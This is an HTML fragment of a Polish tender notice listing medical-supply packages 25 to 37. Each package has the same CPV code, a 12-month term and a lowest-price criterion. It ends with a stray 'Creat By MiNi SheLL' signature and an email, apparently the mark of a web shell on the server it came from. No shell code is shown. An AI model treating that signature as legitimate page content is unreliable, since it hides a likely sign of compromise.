<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 25: Szczypczyki biopsyjne,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  szczypczyków biopsyjnych, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet nr 26: Sensor Y,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  sensora Y, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet nr 27: Zestaw do szycia rzepki,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  zestawu do szycia rzepki, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet nr 28: Obwód oddechowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  obwód oddechowy, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet nr 29: Pokrowce na SCOP.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  pokrowce na SCOP, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet nr 30 - Opatrunek do mocowania brzegów ran.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  opatruneków do mocowania brzegów ran, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet nr 31 - Rurki krtaniowe jednorazowe i wielorazowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  rurek krtaniowych jednorazowych i wielorazowych, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pakiet nr 32 - Rurka metalowa do tchawicy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  rurki metalowej do tchawicy, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Pakiet nr 33 - Miski nerkowate.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  misek nerkowate, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Pakiet nr 34 - Pipeta.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  pipety, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Pakiet nr 35 - Pakiet nr 35 - Opaska przeciwodleżynowa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  opaski przeciwodleżynowa, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Pakiet nr 36 - Ciśnieniomierze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  ciśnieniomierzy, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Pakiet nr 37- Igły do aspiracji szpiku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z dostarczeniem  igły do aspiracji szpiku, w asortymencie i ilościach podanych w załączniku nr 2 SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com